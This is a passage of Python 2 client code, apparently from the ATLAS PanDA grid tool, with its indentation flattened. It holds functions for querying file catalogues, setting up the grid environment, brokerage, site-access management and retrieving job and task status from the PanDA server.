ofile = open(outFile)
line = ofile.readline()
line = re.sub('\n','',line)
exec 'pfnMap = %s' %line
ofile.close()
# remove tmp files
try:
os.remove(inFile)
os.remove(outFile)
except:
pass
# failed
if status != 0:
print "ERROR : failed to access LFC %s" % lfcHost
return {}
break
# return
return pfnMap
# get list of missing LFNs from LFC
def getMissLFNsFromLFC(fileMap,site,explicitSE,verbose=False,nFiles=0,shadowList=[],dsStr='',removedDS=[],
skipScan=False):
# get logger
tmpLog = PLogger.getPandaLogger()
missList = []
# ignore files in shadow
if shadowList != []:
tmpFileMap = {}
for lfn,vals in fileMap.iteritems():
if not lfn in shadowList:
tmpFileMap[lfn] = vals
else:
tmpFileMap = fileMap
# ignore expiring files
if dsStr != '':
tmpTmpFileMap = {}
expFilesMap,expOkFilesList,expCompInDQ2FilesList = getExpiringFiles(dsStr,removedDS,site,verbose,getOKfiles=True)
# collect files in incomplete replicas
for lfn,vals in tmpFileMap.iteritems():
if lfn in expOkFilesList and not lfn in expCompInDQ2FilesList:
tmpTmpFileMap[lfn] = vals
tmpFileMap = tmpTmpFileMap
# skipScan use only complete replicas
if skipScan and expCompInDQ2FilesList == []:
tmpLog.info("%s may hold %s files at most in incomplete replicas but they are not used when --skipScan is set" % \
(site,len(expOkFilesList)))
# get PFNS
if tmpFileMap != {} and not skipScan:
tmpLog.info("scanning LFC %s for files in incompete datasets at %s" % (getLFC(site),site))
pfnMap = _getPFNsLFC(tmpFileMap,site,explicitSE,verbose,nFiles)
else:
pfnMap = {}
for lfn,vals in fileMap.iteritems():
if (not vals['guid'] in pfnMap.keys()) and (not lfn in shadowList) \
and not lfn in expCompInDQ2FilesList:
missList.append(lfn)
# return
return missList
# get grid source file
def _getGridSrc():
# set Grid setup.sh if needed
status,out = commands.getstatusoutput('voms-proxy-info --version')
athenaStatus,athenaPath = commands.getstatusoutput('which athena.py')
if status == 0:
gridSrc = ''
if athenaStatus == 0 and athenaPath.startswith('/afs/in2p3.fr'):
# for LYON, to avoid missing LD_LIBRARY_PATH
gridSrc = '/afs/in2p3.fr/grid/profiles/lcg_env.sh'
elif athenaStatus == 0 and re.search('^/afs/\.*cern.ch',athenaPath) != None:
# for CERN, VDT is already installed
gridSrc = '/dev/null'
else:
# set Grid setup.sh
if os.environ.has_key('PATHENA_GRID_SETUP_SH'):
gridSrc = os.environ['PATHENA_GRID_SETUP_SH']
else:
if not os.environ.has_key('CMTSITE'):
os.environ['CMTSITE'] = ''
if os.environ['CMTSITE'] == 'CERN' or (athenaStatus == 0 and \
re.search('^/afs/\.*cern.ch',athenaPath) != None):
gridSrc = '/dev/null'
elif os.environ['CMTSITE'] == 'BNL':
gridSrc = '/afs/usatlas.bnl.gov/osg/client/@sys/current/setup.sh'
else:
# try to determin site using path to athena
if athenaStatus == 0 and athenaPath.startswith('/afs/in2p3.fr'):
# LYON
gridSrc = '/afs/in2p3.fr/grid/profiles/lcg_env.sh'
elif athenaStatus == 0 and athenaPath.startswith('/cvmfs/atlas.cern.ch'):
# CVMFS
if not os.environ.has_key('ATLAS_LOCAL_ROOT_BASE'):
os.environ['ATLAS_LOCAL_ROOT_BASE'] = '/cvmfs/atlas.cern.ch/repo/ATLASLocalRootBase'
gridSrc = os.environ['ATLAS_LOCAL_ROOT_BASE'] + '/user/pandaGridSetup.sh'
else:
print "ERROR : PATHENA_GRID_SETUP_SH is not defined in envvars"
print " for CERN on SLC6 : export PATHENA_GRID_SETUP_SH=/dev/null"
print " for CERN on SLC5 : export PATHENA_GRID_SETUP_SH=/afs/cern.ch/project/gd/LCG-share/current_3.2/etc/profile.d/grid_env.sh"
print " for LYON : export PATHENA_GRID_SETUP_SH=/afs/in2p3.fr/grid/profiles/lcg_env.sh"
print " for BNL : export PATHENA_GRID_SETUP_SH=/afs/usatlas.bnl.gov/osg/client/@sys/current/setup.sh"
return False
# check grid-proxy
if gridSrc != '':
gridSrc = 'source %s > /dev/null;' % gridSrc
# some grid_env.sh doen't correct PATH/LD_LIBRARY_PATH
gridSrc = "unset LD_LIBRARY_PATH; unset PYTHONPATH; unset MANPATH; export PATH=/usr/local/bin:/bin:/usr/bin; %s" % gridSrc
# return
return gridSrc
# get DN
def getDN(origString):
shortName = ''
distinguishedName = ''
for line in origString.split('/'):
if line.startswith('CN='):
distinguishedName = re.sub('^CN=','',line)
distinguishedName = re.sub('\d+$','',distinguishedName)
distinguishedName = re.sub('\.','',distinguishedName)
distinguishedName = distinguishedName.strip()
if re.search(' ',distinguishedName) != None:
# look for full name
distinguishedName = distinguishedName.replace(' ','')
break
elif shortName == '':
# keep short name
shortName = distinguishedName
distinguishedName = ''
# use short name
if distinguishedName == '':
distinguishedName = shortName
# return
return distinguishedName
from HTMLParser import HTMLParser
class _monHTMLParser(HTMLParser):
def __init__(self):
HTMLParser.__init__(self)
self.map = {}
self.switch = False
self.td = False
def getMap(self):
retMap = {}
if len(self.map) > 1:
names = self.map[0]
vals = self.map[1]
# values
try:
retMap['total'] = int(vals[names.index('Jobs')])
except:
retMap['total'] = 0
try:
retMap['finished'] = int(vals[names.index('Finished')])
except:
retMap['finished'] = 0
try:
retMap['failed'] = int(vals[names.index('Failed')])
except:
retMap['failed'] = 0
retMap['running'] = retMap['total'] - retMap['finished'] - \
retMap['failed']
return retMap
def handle_data(self, data):
if self.switch:
if self.td:
self.td = False
self.map[len(self.map)-1].append(data)
else:
self.map[len(self.map)-1][-1] += data
else:
if data == "Job Sets:":
self.switch = True
def handle_starttag(self, tag, attrs):
if self.switch and tag == 'tr':
self.map[len(self.map)] = []
if self.switch and tag == 'td':
self.td = True
def handle_endtag(self, tag):
if self.switch and self.td:
self.map[len(self.map)-1].append("")
self.td = False
# get jobInfo from Mon
def getJobStatusFromMon(id,verbose=False):
# get name
shortName = ''
distinguishedName = ''
for line in commands.getoutput('%s grid-proxy-info -identity' % _getGridSrc()).split('/'):
if line.startswith('CN='):
distinguishedName = re.sub('^CN=','',line)
distinguishedName = re.sub('\d+$','',distinguishedName)
distinguishedName = distinguishedName.strip()
if re.search(' ',distinguishedName) != None:
# look for full name
break
elif shortName == '':
# keep short name
shortName = distinguishedName
distinguishedName = ''
# use short name
if distinguishedName == '':
distinguishedName = shortName
# instantiate curl
curl = _Curl()
curl.verbose = verbose
data = {'job':'*',
'jobDefinitionID' : id,
'user' : distinguishedName,
'days' : 100}
# execute
status,out = curl.get(baseURLMON,data)
if status != 0 or re.search('Panda monitor and browser',out)==None:
return {}
# parse
parser = _monHTMLParser()
for line in out.split('\n'):
if re.search('Job Sets:',line) != None:
parser.feed( line )
break
return parser.getMap()
def isDirectAccess(site,usingRAW=False,usingTRF=False,usingARA=False):
# unknown site
if not PandaSites.has_key(site):
return False
# parse copysetup
params = PandaSites[site]['copysetup'].split('^')
# doesn't use special parameters
if len(params) < 5:
return False
# directIn
directIn = params[4]
if directIn != 'True':
return False
# xrootd uses local copy for RAW
newPrefix = params[2]
if newPrefix.startswith('root:'):
if usingRAW:
return False
# official TRF doesn't work with direct dcap/xrootd
if usingTRF and (not usingARA):
if newPrefix.startswith('root:') or newPrefix.startswith('dcap:') or \
newPrefix.startswith('dcache:') or newPrefix.startswith('gsidcap:'):
return False
# return
return True
# run brokerage
def runBrokerage(sites,atlasRelease,cmtConfig=None,verbose=False,trustIS=False,cacheVer='',processingType='',
loggingFlag=False,memorySize=0,useDirectIO=False,siteGroup=None,maxCpuCount=-1,rootVer=''):
# use only directIO sites
nonDirectSites = []
if useDirectIO:
tmpNewSites = []
for tmpSite in sites:
if isDirectAccess(tmpSite):
tmpNewSites.append(tmpSite)
else:
nonDirectSites.append(tmpSite)
sites = tmpNewSites
if sites == []:
if not loggingFlag:
return 0,'ERROR : no candidate.'
else:
return 0,{'site':'ERROR : no candidate.','logInfo':[]}
# choose at most 50 sites randomly to avoid too many lookup
random.shuffle(sites)
sites = sites[:50]
# serialize
strSites = pickle.dumps(sites)
# instantiate curl
curl = _Curl()
curl.sslCert = _x509()
curl.sslKey = _x509()
curl.verbose = verbose
# execute
url = baseURLSSL + '/runBrokerage'
data = {'sites':strSites,
'atlasRelease':atlasRelease}
if cmtConfig != None:
data['cmtConfig'] = cmtConfig
if trustIS:
data['trustIS'] = True
if maxCpuCount > 0:
data['maxCpuCount'] = maxCpuCount
if cacheVer != '':
# change format if needed
cacheVer = re.sub('^-','',cacheVer)
match = re.search('^([^_]+)_(\d+\.\d+\.\d+\.\d+\.*\d*)$',cacheVer)
if match != None:
cacheVer = '%s-%s' % (match.group(1),match.group(2))
else:
# nightlies
match = re.search('_(rel_\d+)$',cacheVer)
if match != None:
# use base release as cache version
cacheVer = '%s:%s' % (atlasRelease,match.group(1))
# use cache for brokerage
data['atlasRelease'] = cacheVer
# use ROOT ver
if rootVer != '' and data['atlasRelease'] == '':
data['atlasRelease'] = 'ROOT-%s' % rootVer
if processingType != '':
# set processingType mainly for HC
data['processingType'] = processingType
# enable logging
if loggingFlag:
data['loggingFlag'] = True
# memory size
if not memorySize in [-1,0,None,'NULL']:
data['memorySize'] = memorySize
# site group
if not siteGroup in [None,-1]:
data['siteGroup'] = siteGroup
status,output = curl.get(url,data)
try:
if not loggingFlag:
return status,output
else:
outputPK = pickle.loads(output)
# add directIO info
if nonDirectSites != []:
if not outputPK.has_key('logInfo'):
outputPK['logInfo'] = []
for tmpSite in nonDirectSites:
msgBody = 'action=skip site=%s reason=nondirect - not directIO site' % tmpSite
outputPK['logInfo'].append(msgBody)
return status,outputPK
except:
type, value, traceBack = sys.exc_info()
print output
print "ERROR runBrokerage : %s %s" % (type,value)
return EC_Failed,None
# run rebrokerage
def runReBrokerage(jobID,libDS='',cloud=None,verbose=False):
# instantiate curl
curl = _Curl()
curl.sslCert = _x509()
curl.sslKey = _x509()
curl.verbose = verbose
# execute
url = baseURLSSL + '/runReBrokerage'
data = {'jobID':jobID}
if cloud != None:
data['cloud'] = cloud
if not libDS in ['',None,'NULL']:
data['libDS'] = libDS
retVal = curl.get(url,data)
# communication error
if retVal[0] != 0:
return retVal
# succeeded
if retVal[1] == True:
return 0,''
# server error
errMsg = retVal[1]
if errMsg.startswith('ERROR: '):
# remove ERROR:
errMsg = re.sub('ERROR: ','',errMsg)
return EC_Failed,errMsg
# retry failed jobs in Active
def retryFailedJobsInActive(jobID,verbose=False):
# instantiate curl
curl = _Curl()
curl.sslCert = _x509()
curl.sslKey = _x509()
curl.verbose = verbose
# execute
url = baseURLSSL + '/retryFailedJobsInActive'
data = {'jobID':jobID}
retVal = curl.get(url,data)
# communication error
if retVal[0] != 0:
return retVal
# succeeded
if retVal[1] == True:
return 0,''
# server error
errMsg = retVal[1]
if errMsg.startswith('ERROR: '):
# remove ERROR:
errMsg = re.sub('ERROR: ','',errMsg)
return EC_Failed,errMsg
# send brokerage log
def sendBrokerageLog(jobID,jobsetID,brokerageLogs,verbose):
# instantiate curl
curl = _Curl()
curl.sslCert = _x509()
curl.sslKey = _x509()
curl.verbose = verbose
msgList = []
for tmpMsgBody in brokerageLogs:
if not jobsetID in [None,'NULL']:
tmpMsg = ' : jobset=%s jobdef=%s : %s' % (jobsetID,jobID,tmpMsgBody)
else:
tmpMsg = ' : jobdef=%s : %s' % (jobID,tmpMsgBody)
msgList.append(tmpMsg)
# execute
url = baseURLSSL + '/sendLogInfo'
data = {'msgType':'analy_brokerage',
'msgList':pickle.dumps(msgList)}
retVal = curl.post(url,data)
return True
# exclude long,xrootd,local queues
def isExcudedSite(tmpID):
excludedSite = False
for exWord in ['ANALY_LONG_','_LOCAL','_test']:
if re.search(exWord,tmpID,re.I) != None:
excludedSite = True
break
return excludedSite
# get default space token
def getDefaultSpaceToken(fqans,defaulttoken):
# mapping is not defined
if defaulttoken == '':
return ''
# loop over all groups
for tmpStr in defaulttoken.split(','):
# extract group and token
items = tmpStr.split(':')
if len(items) != 2:
continue
tmpGroup = items[0]
tmpToken = items[1]
# look for group
if re.search(tmpGroup+'/',fqans) != None:
return tmpToken
# not found
return ''
# use dev server
def useDevServer():
global baseURL
baseURL = 'http://aipanda007.cern.ch:25080/server/panda'
global baseURLSSL
baseURLSSL = 'https://aipanda007.cern.ch:25443/server/panda'
global baseURLCSRV
baseURLCSRV = 'https://aipanda007.cern.ch:25443/server/panda'
global baseURLCSRVSSL
baseURLCSRVSSL = 'https://aipanda007.cern.ch:25443/server/panda'
global baseURLSUB
baseURLSUB = 'http://atlpan.web.cern.ch/atlpan'
# use INTR server
def useIntrServer():
global baseURL
baseURL = 'http://aipanda027.cern.ch:25080/server/panda'
global baseURLSSL
baseURLSSL = 'https://aipanda027.cern.ch:25443/server/panda'
# set server
def setServer(urls):
global baseURL
baseURL = urls.split(',')[0]
global baseURLSSL
baseURLSSL = urls.split(',')[-1]
# set cache server
def setCacheServer(urls):
global baseURLCSRV
baseURLCSRV = urls.split(',')[0]
global baseURLCSRVSSL
baseURLCSRVSSL = urls.split(',')[-1]
# register proxy key
def registerProxyKey(credname,origin,myproxy,verbose=False):
# instantiate curl
curl = _Curl()
curl.sslCert = _x509()
curl.sslKey = _x509()
curl.verbose = verbose
curl.verifyHost = True
# execute
url = baseURLSSL + '/registerProxyKey'
data = {'credname': credname,
'origin' : origin,
'myproxy' : myproxy
}
return curl.post(url,data)
# get proxy key
def getProxyKey(verbose=False):
# instantiate curl
curl = _Curl()
curl.sslCert = _x509()
curl.sslKey = _x509()
curl.verbose = verbose
# execute
url = baseURLSSL + '/getProxyKey'
status,output = curl.post(url,{})
if status!=0:
print output
return status,None
try:
return status,pickle.loads(output)
except:
type, value, traceBack = sys.exc_info()
print "ERROR getProxyKey : %s %s" % (type,value)
return EC_Failed,None
# add site access
def addSiteAccess(siteID,verbose=False):
# instantiate curl
curl = _Curl()
curl.sslCert = _x509()
curl.sslKey = _x509()
curl.verbose = verbose
# execute
url = baseURLSSL + '/addSiteAccess'
data = {'siteID': siteID}
status,output = curl.post(url,data)
if status!=0:
print output
return status,None
try:
return status,pickle.loads(output)
except:
type, value, traceBack = sys.exc_info()
print "ERROR listSiteAccess : %s %s" % (type,value)
return EC_Failed,None
# list site access
def listSiteAccess(siteID,verbose=False,longFormat=False):
# instantiate curl
curl = _Curl()
curl.sslCert = _x509()
curl.sslKey = _x509()
curl.verbose = verbose
# execute
url = baseURLSSL + '/listSiteAccess'
data = {}
if siteID != None:
data['siteID'] = siteID
if longFormat:
data['longFormat'] = True
status,output = curl.post(url,data)
if status!=0:
print output
return status,None
try:
return status,pickle.loads(output)
except:
type, value, traceBack = sys.exc_info()
print "ERROR listSiteAccess : %s %s" % (type,value)
return EC_Failed,None
# update site access
def updateSiteAccess(method,siteid,userName,verbose=False,value=''):
# instantiate curl
curl = _Curl()
curl.sslCert = _x509()
curl.sslKey = _x509()
curl.verbose = verbose
# execute
url = baseURLSSL + '/updateSiteAccess'
data = {'method':method,'siteid':siteid,'userName':userName}
if value != '':
data['attrValue'] = value
status,output = curl.post(url,data)
if status!=0:
print output
return status,None
try:
return status,output
except:
type, value, traceBack = sys.exc_info()
print "ERROR updateSiteAccess : %s %s" % (type,value)
return EC_Failed,None
# site access map
SiteAcessMapForWG = None
# add allowed sites
def addAllowedSites(verbose=False):
# get logger
tmpLog = PLogger.getPandaLogger()
if verbose:
tmpLog.debug('check site access')
# get access list
global SiteAcessMapForWG
SiteAcessMapForWG = {}
tmpStatus,tmpOut = listSiteAccess(None,verbose,True)
if tmpStatus != 0:
return False
global PandaSites
for tmpVal in tmpOut:
tmpID = tmpVal['primKey']
# keep info to map
SiteAcessMapForWG[tmpID] = tmpVal
# set online if the site is allowed
if tmpVal['status']=='approved':
if PandaSites.has_key(tmpID):
if PandaSites[tmpID]['status'] in ['brokeroff']:
PandaSites[tmpID]['status'] = 'online'
if verbose:
tmpLog.debug('set %s online' % tmpID)
return True
# check permission
def checkSiteAccessPermission(siteName,workingGroup,verbose):
# get site access if needed
if SiteAcessMapForWG == None:
ret = addAllowedSites(verbose)
if not ret:
return True
# don't check if site name is undefined
if siteName == None:
return True
# get logger
tmpLog = PLogger.getPandaLogger()
if verbose:
tmpLog.debug('checking site access permission')
tmpLog.debug('site=%s workingGroup=%s map=%s' % (siteName,workingGroup,str(SiteAcessMapForWG)))
# check
if (not SiteAcessMapForWG.has_key(siteName)) or SiteAcessMapForWG[siteName]['status'] != 'approved':
errStr = "You don't have permission to send jobs to %s with workingGroup=%s. " % (siteName,workingGroup)
# allowed member only
if PandaSites[siteName]['accesscontrol'] == 'grouplist':
tmpLog.error(errStr)
return False
else:
# reset workingGroup
if not workingGroup in ['',None]:
errStr += 'Resetting workingGroup to None'
tmpLog.warning(errStr)
return True
elif not workingGroup in ['',None]:
# check workingGroup
wgList = SiteAcessMapForWG[siteName]['workingGroups'].split(',')
if not workingGroup in wgList:
errStr = "Invalid workingGroup=%s. Must be one of %s. " % (workingGroup,str(wgList))
errStr += 'Resetting workingGroup to None'
tmpLog.warning(errStr)
return True
# no problems
return True
# get JobIDs in a time range
def getJobIDsInTimeRange(timeRange,dn=None,verbose=False):
# instantiate curl
curl = _Curl()
curl.sslCert = _x509()
curl.sslKey = _x509()
curl.verbose = verbose
# execute
url = baseURLSSL + '/getJobIDsInTimeRange'
data = {'timeRange':timeRange}
if dn != None:
data['dn'] = dn
status,output = curl.post(url,data)
if status!=0:
print output
return status,None
try:
return status,pickle.loads(output)
except:
type, value, traceBack = sys.exc_info()
print "ERROR getJobIDsInTimeRange : %s %s" % (type,value)
return EC_Failed,None
# get JobIDs and jediTasks in a time range
def getJobIDsJediTasksInTimeRange(timeRange, dn=None, minTaskID=None, verbose=False):
# instantiate curl
curl = _Curl()
curl.sslCert = _x509()
curl.sslKey = _x509()
curl.verbose = verbose
# execute
url = baseURLSSL + '/getJediTasksInTimeRange'
data = {'timeRange': timeRange,
'fullFlag': True}
if dn != None:
data['dn'] = dn
if minTaskID is not None:
data['minTaskID'] = minTaskID
status,output = curl.post(url,data)
if status!=0:
print output
return status, None
try:
jediTaskDicts = pickle.loads(output)
return 0, jediTaskDicts
except:
type, value, traceBack = sys.exc_info()
print "ERROR getJediTasksInTimeRange : %s %s" % (type,value)
return EC_Failed, None
# get details of jedi task
def getJediTaskDetails(taskDict,fullFlag,withTaskInfo,verbose=False):
# instantiate curl
curl = _Curl()
curl.sslCert = _x509()
curl.sslKey = _x509()
curl.verbose = verbose
# execute
url = baseURLSSL + '/getJediTaskDetails'
data = {'jediTaskID':taskDict['jediTaskID'],
'fullFlag':fullFlag,
'withTaskInfo':withTaskInfo}
status,output = curl.post(url,data)
if status != 0:
print output
return status,None
try:
tmpDict = pickle.loads(output)
# server error
if tmpDict == {}:
print "ERROR getJediTaskDetails got empty"
return EC_Failed,None
# copy
for tmpKey,tmpVal in tmpDict.iteritems():
taskDict[tmpKey] = tmpVal
return 0,taskDict
except:
errType,errValue = sys.exc_info()[:2]
print "ERROR getJediTaskDetails : %s %s" % (errType,errValue)
return EC_Failed,None
# get PandaIDs for a JobID
def getPandIDsWithJobID(jobID,dn=None,nJobs=0,verbose=False):
# instantiate curl
curl = _Curl()
curl.sslCert = _x509()
curl.sslKey = _x509()
curl.verbose = verbose
# execute
url = baseURLSSL + '/getPandIDsWithJobID'
data = {'jobID':jobID, 'nJobs':nJobs}
if dn != None:
data['dn'] = dn
status,output = curl.post(url,data)
if status!=0:
print output
return status,None
try:
return status,pickle.loads(output)
except:
type, value, traceBack = sys.exc_info()
print "ERROR getPandIDsWithJobID : %s %s" % (type,value)
return EC_Failed,None
# check merge job generation for a JobID
def checkMergeGenerationStatus(jobID,dn=None,verbose=False):
# instantiate curl
curl = _Curl()
curl.sslCert = _x509()
curl.sslKey = _x509()
curl.verbose = verbose
# execute
url = baseURLSSL + '/checkMergeGenerationStatus'
data = {'jobID':jobID}
if dn != None:
data['dn'] = dn
status,output = curl.post(url,data)
if status!=0:
print output
return status,None
try:
return status,pickle.loads(output)
except:
type, value, traceBack = sys.exc_info()
print "ERROR checkMergeGenerationStatus : %s %s" % (type,value)
return EC_Failed,None
# get full job status
def getFullJobStatus(ids,verbose):
# serialize
strIDs = pickle.dumps(ids)
# instantiate curl
curl = _Curl()
curl.sslCert = _x509()
curl.sslKey = _x509()
curl.verbose = verbose
# execute
url = baseURLSSL + '/getFullJobStatus'
data = {'ids':strIDs}
status,output = curl.post(url,data)
try:
return status,pickle.loads(output)
except:
type, value, traceBack = sys.exc_info()
print "ERROR getFullJobStatus : %s %s" % (type,value)
return EC_Failed,None
# get slimmed file info
def getSlimmedFileInfoPandaIDs(ids,verbose):
# serialize
strIDs = pickle.dumps(ids)
# instantiate curl
curl = _Curl()
curl.sslCert = _x509()
curl.sslKey = _x509()
curl.verbose = verbose
# execute
url = baseURLSSL + '/getSlimmedFileInfoPandaIDs'
data = {'ids':strIDs}
status,output = curl.post(url,data)
try:
return status,pickle.loads(output)
except:
type, value, traceBack = sys.exc_info()
print "ERROR getSlimmedFileInfoPandaIDs : %s %s" % (type,value)
return EC_Failed,None
# get input files currently in used for analysis
def getFilesInUseForAnal(outDataset,verbose):
# instantiate curl
curl = _Curl()
curl.sslCert = _x509()
curl.sslKey = _x509()
curl.verbose = verbose
# execute
url = baseURLSSL + '/getDisInUseForAnal'
data = {'outDataset':outDataset}
status,output = curl.post(url,data)
try:
inputDisList = pickle.loads(output)
# failed
if inputDisList == None:
print "ERROR getFilesInUseForAnal : failed to get shadow dis list from the panda server"
sys.exit(EC_Failed)
# split to small chunks to avoid timeout
retLFNs = []
nDis = 3
iDis = 0
while iDis < len(inputDisList):
# serialize
strInputDisList = pickle.dumps(inputDisList[iDis:iDis+nDis])
# get LFNs
url = baseURLSSL + '/getLFNsInUseForAnal'
data = {'inputDisList':strInputDisList}
status,output = curl.post(url,data)
tmpLFNs = pickle.loads(output)
if tmpLFNs == None:
print "ERROR getFilesInUseForAnal : failed to get LFNs in shadow dis from the panda server"
sys.exit(EC_Failed)
retLFNs += tmpLFNs
iDis += nDis
time.sleep(1)
return retLFNs
except:
type, value, traceBack = sys.exc_info()
print "ERROR getFilesInUseForAnal : %s %s" % (type,value)
sys.exit(EC_Failed)
# set debug mode
def setDebugMode(pandaID,modeOn,verbose):
# instantiate curl
curl = _Curl()
curl.sslCert = _x509()
curl.sslKey = _x509()
curl.verbose = verbose
# execute
url = baseURLSSL + '/setDebugMode'
data = {'pandaID':pandaID,'modeOn':modeOn}
status,output = curl.post(url,data)
try:
return status,output
except:
type, value = sys.exc_info()[:2]
errStr = "setDebugMode failed with %s %s" % (type,value)
return EC_Failed,errStr
# set tmp dir
def setGlobalTmpDir(tmpDir):
global globalTmpDir
globalTmpDir = tmpDir
# exclude site
def excludeSite(excludedSiteList,origFullExecString='',infoList=[]):
if excludedSiteList == []:
return
# decompose
excludedSite = []
for tmpItemList in excludedSiteList:
for tmpItem in tmpItemList.split(','):
if tmpItem != '' and not tmpItem in excludedSite:
excludedSite.append(tmpItem)
# get list of original excludedSites
origExcludedSite = []
if origFullExecString != '':
# extract original excludedSite
origFullExecString = urllib.unquote(origFullExecString)
matchItr = re.finditer('--excludedSite\s*=*([^ "]+)',origFullExecString)
for match in matchItr:
origExcludedSite += match.group(1).split(',')
else:
# use excludedSite since this is the first loop
origExcludedSite = excludedSite
# remove empty
if '' in origExcludedSite:
origExcludedSite.remove('')
# sites composed of long/short queues
compSites = ['CERN','LYON','BNL']
# remove sites
global PandaSites
for tmpPatt in excludedSite:
# skip empty
if tmpPatt == '':
continue
# check if the user sepcified
userSpecified = False
if tmpPatt in origExcludedSite:
userSpecified = True
# check if it is a composite
for tmpComp in compSites:
if tmpComp in tmpPatt:
# use generic ID to remove all queues
tmpPatt = tmpComp
break
sites = PandaSites.keys()
for site in sites:
# look for pattern
if tmpPatt in site:
try:
# add brokerage info
if userSpecified and PandaSites[site]['status'] == 'online' and not isExcudedSite(site):
msgBody = 'action=exclude site=%s reason=useroption - excluded by user' % site
if not msgBody in infoList:
infoList.append(msgBody)
PandaSites[site]['status'] = 'excluded'
else:
# already used by previous submission cycles
PandaSites[site]['status'] = 'panda_excluded'
except:
pass
# use certain sites
def useCertainSites(sitePat):
if re.search(',',sitePat) == None:
return sitePat,[]
# remove sites
global PandaSites
sites = PandaSites.keys()
cloudsForRandom = []
for site in sites:
# look for pattern
useThisSite = False
for tmpPatt in sitePat.split(','):
if tmpPatt in site:
useThisSite = True
break
# delete
if not useThisSite:
PandaSites[site]['status'] = 'skip'
else:
if not PandaSites[site]['cloud'] in cloudsForRandom:
cloudsForRandom.append(PandaSites[site]['cloud'])
# return
return 'AUTO',cloudsForRandom
# get client version
def getPandaClientVer(verbose):
# instantiate curl
curl = _Curl()
curl.verbose = verbose
# execute
url = baseURL + '/getPandaClientVer'
status,output = curl.get(url,{})
# failed
if status != 0:
return status,output
# check format
if re.search('^\d+\.\d+\.\d+$',output) == None:
return EC_Failed,"invalid version '%s'" % output
# return
return status,output
# get list of cache prefix
def getCachePrefixes(verbose):
# instantiate curl
curl = _Curl()
curl.verbose = verbose
# execute
url = baseURL + '/getCachePrefixes'
status,output = curl.get(url,{})
# failed
if status != 0:
print output
errStr = "cannot get the list of Athena projects"
tmpLog.error(errStr)
sys.exit(EC_Failed)
# return
try:
tmpList = pickle.loads(output)
tmpList.append('AthAnalysisBase')
return tmpList
except:
print output
errType,errValue = sys.exc_info()[:2]
print "ERROR: getCachePrefixes : %s %s" % (errType,errValue)
sys.exit(EC_Failed)
# get list of cmtConfig
def getCmtConfigList(athenaVer,verbose):
# instantiate curl
curl = _Curl()
curl.verbose = verbose
# execute
url = baseURL + '/getCmtConfigList'
data = {}
data['relaseVer'] = athenaVer
status,output = curl.get(url,data)
# failed
if status != 0:
print output
errStr = "cannot get the list of cmtconfig for %s" % athenaVer
tmpLog.error(errStr)
sys.exit(EC_Failed)
# return
try:
return pickle.loads(output)
except:
print output
errType,errValue = sys.exc_info()[:2]
print "ERROR: getCmtConfigList : %s %s" % (errType,errValue)
sys.exit(EC_Failed)
# get files in dataset with filte
def getFilesInDatasetWithFilter(inDS,filter,shadowList,inputFileListName,verbose,dsStringFlag=False,isRecursive=False,
antiFilter='',notSkipLog=False):
# get logger
tmpLog = PLogger.getPandaLogger()
# query files in dataset
if not isRecursive or verbose:
tmpLog.info("query files in %s" % inDS)
if dsStringFlag:
inputFileMap,inputDsString = queryFilesInDataset(inDS,verbose,getDsString=True)
else:
inputFileMap = queryFilesInDataset(inDS,verbose)
# read list of files to be used
filesToBeUsed = []
if inputFileListName != '':
rFile = open(inputFileListName)
for line in rFile:
line = re.sub('\n','',line)
line = line.strip()
if line != '':
filesToBeUsed.append(line)
rFile.close()
# get list of filters
filters = []
if filter != '':
filters = filter.split(',')
antifilters = []
if antiFilter != '':
antifilters = antiFilter.split(',')
# remove redundant files
tmpKeys = inputFileMap.keys()
filesPassFilter = []
for tmpLFN in tmpKeys:
# remove log
if not notSkipLog:
if re.search('\.log(\.tgz)*(\.\d+)*$',tmpLFN) != None or \
re.search('\.log(\.\d+)*(\.tgz)*$',tmpLFN) != None:
del inputFileMap[tmpLFN]
continue
# filename matching
if filter != '':
matchFlag = False
for tmpFilter in filters:
if re.search(tmpFilter,tmpLFN) != None:
matchFlag = True
break
if not matchFlag:
del inputFileMap[tmpLFN]
continue
# anti matching
if antiFilter != '':
antiMatchFlag = False
for tmpFilter in antifilters:
if re.search(tmpFilter,tmpLFN) != None:
antiMatchFlag = True
break
if antiMatchFlag:
del inputFileMap[tmpLFN]
continue
# files to be used
if filesToBeUsed != []:
# check matching
matchFlag = False
for pattern in filesToBeUsed:
# normal matching
if pattern == tmpLFN:
matchFlag =True
break
# doesn't match
if not matchFlag:
del inputFileMap[tmpLFN]
continue
# files which pass the matching filters
filesPassFilter.append(tmpLFN)
# files in shadow
if tmpLFN in shadowList:
if inputFileMap.has_key(tmpLFN):
del inputFileMap[tmpLFN]
continue
# no files in filelist are available
if inputFileMap == {} and (filter != '' or antiFilter != '' or inputFileListName != '') and filesPassFilter == []:
if inputFileListName != '':
errStr = "Files specified in %s are unavailable in %s. " % (inputFileListName,inDS)
elif filter != '':
errStr = "Files matching with %s are unavailable in %s. " % (filters,inDS)
else:
errStr = "Files unmatching with %s are unavailable in %s. " % (antifilters,inDS)
errStr += "Make sure that you specify correct file names or matching patterns"
tmpLog.error(errStr)
sys.exit(EC_Failed)
# return
if dsStringFlag:
return inputFileMap,inputDsString
return inputFileMap
# check if DQ2-free site
def isDQ2free(site):
if PandaSites.has_key(site) and PandaSites[site]['ddm'] == 'local':
return True
return False
# check queued analysis jobs at a site
def checkQueuedAnalJobs(site,verbose=False):
# get logger
tmpLog = PLogger.getPandaLogger()
# instantiate curl
curl = _Curl()
curl.sslCert = _x509()
curl.sslKey = _x509()
curl.verbose = verbose
# execute
url = baseURLSSL + '/getQueuedAnalJobs'
data = {'site':site}
status,output = curl.post(url,data)
try:
# get queued analysis
queuedMap = pickle.loads(output)
if queuedMap.has_key('running') and queuedMap.has_key('queued'):
if queuedMap['running'] > 20 and queuedMap['queued'] > 2 * queuedMap['running']:
warStr = 'Your job might be delayed since %s is busy. ' % site
warStr += 'There are %s jobs already queued by other users while %s jobs are running. ' \
% (queuedMap['queued'],queuedMap['running'])
warStr += 'Please consider replicating the input dataset to a free site '
warStr += 'or avoiding the --site/--cloud option so that the brokerage will '
warStr += 'find a free site'
tmpLog.warning(warStr)
except:
type, value, traceBack = sys.exc_info()
tmpLog.error("checkQueuedAnalJobs %s %s" % (type,value))
# request EventPicking
def requestEventPicking(eventPickEvtList,eventPickDataType,eventPickStreamName,
eventPickDS,eventPickAmiTag,fileList,fileListName,outDS,
lockedBy,params,eventPickNumSites,eventPickWithGUID,ei_api,
verbose=False):
# get logger
tmpLog = PLogger.getPandaLogger()
# list of input files
strInput = ''
